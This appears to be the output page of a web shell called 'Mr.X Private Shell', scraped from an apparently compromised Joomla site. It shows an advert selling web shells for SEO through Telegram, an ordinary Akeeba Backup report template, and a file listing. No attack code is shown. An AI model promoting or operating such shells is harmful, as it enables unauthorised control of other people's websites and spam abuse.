__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
/**
* @package akeebabackup
* @copyright Copyright (c)2006-2024 Nicholas K. Dionysopoulos / Akeeba Ltd
* @license GNU General Public License version 3, or later
*/
defined('_JEXEC') || die;
use Joomla\CMS\Language\Text;
/** @var \Akeeba\Component\AkeebaBackup\Administrator\View\Alice\HtmlView $this */
?>
<div class="card">
<h3 class="card-header"><?= Text::_('COM_AKEEBABACKUP_ALICE_ANALYSIS_REPORT_HEAD') ?></h3>
<div class="card-body">
<p>
<?= Text::sprintf('COM_AKEEBABACKUP_ALICE_ANALYSIS_REPORT_LBL_SUMMARY', $this->doneChecks) ?>
</p>
</div>
</div>
<?php if ($this->aliceStatus == 'success'): ?>
<p class="alert alert-success">
<?= Text::_('COM_AKEEBABACKUP_ALICE_ANALYSIS_REPORT_LBL_SUMMARY_SUCCESS') ?>
</p>
<?php elseif ($this->aliceStatus == 'warnings'): ?>
<p class="alert alert-warning">
<?= Text::_('COM_AKEEBABACKUP_ALICE_ANALYSIS_REPORT_LBL_SUMMARY_WARNINGS') ?>
</p>
<?php else: ?>
<p class="alert alert-danger">
<?= Text::_('COM_AKEEBABACKUP_ALICE_ANALYSIS_REPORT_LBL_SUMMARY_ERRORS') ?>
</p>
<?php endif ?>
<?php if ($this->aliceStatus != 'success'): ?>
<div class="card">
<h3 class="card-header bg-<?= ($this->aliceStatus == 'error') ? 'danger text-white' : 'warning' ?>">
<?php if ($this->aliceStatus == 'error'): ?>
<?= Text::_('COM_AKEEBABACKUP_ALICE_ANALYSIS_REPORT_LBL_ERROR') ?>
<?php else: ?>
<?= Text::_('COM_AKEEBABACKUP_ALICE_ANALYSIS_REPORT_LBL_WARNINGS') ?>
<?php endif; ?>
</h3>
<div class="card-body">
<?php if ($this->aliceStatus == 'error'): ?>
<h4><?= $this->aliceError['message'] ?></h4>
<p class="fst-italic">
<?= Text::_('COM_AKEEBABACKUP_ALICE_ANALYSIS_REPORT_LBL_SOLUTION') ?>
</p>
<p>
<?= $this->aliceError['solution'] ?>
</p>
<?php else: ?>
<table class="table table-striped">
<tbody>
<?php foreach($this->aliceWarnings as $warning): ?>
<tr>
<td>
<h5><?= $warning['message'] ?></h5>
<p class="fst-italic">
<?= Text::_('COM_AKEEBABACKUP_ALICE_ANALYSIS_REPORT_LBL_SOLUTION') ?>
</p>
<p>
<?= $warning['solution'] ?>
</p>
</td>
</tr>
<?php endforeach ?>
</tbody>
</table>
<?php endif ?>
</div>
</div>
<p class="my-3 alert alert-info">
<?= Text::_('COM_AKEEBABACKUP_ALICE_ANALYSIS_REPORT_LBL_NEXTSTEPS') ?>
</p>
<?php endif ?>| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| default.php | File | 1.81 KB | 0664 |
|
| error.php | File | 984 B | 0664 |
|
| result.php | File | 2.4 KB | 0664 |
|
| step.php | File | 1.57 KB | 0664 |
|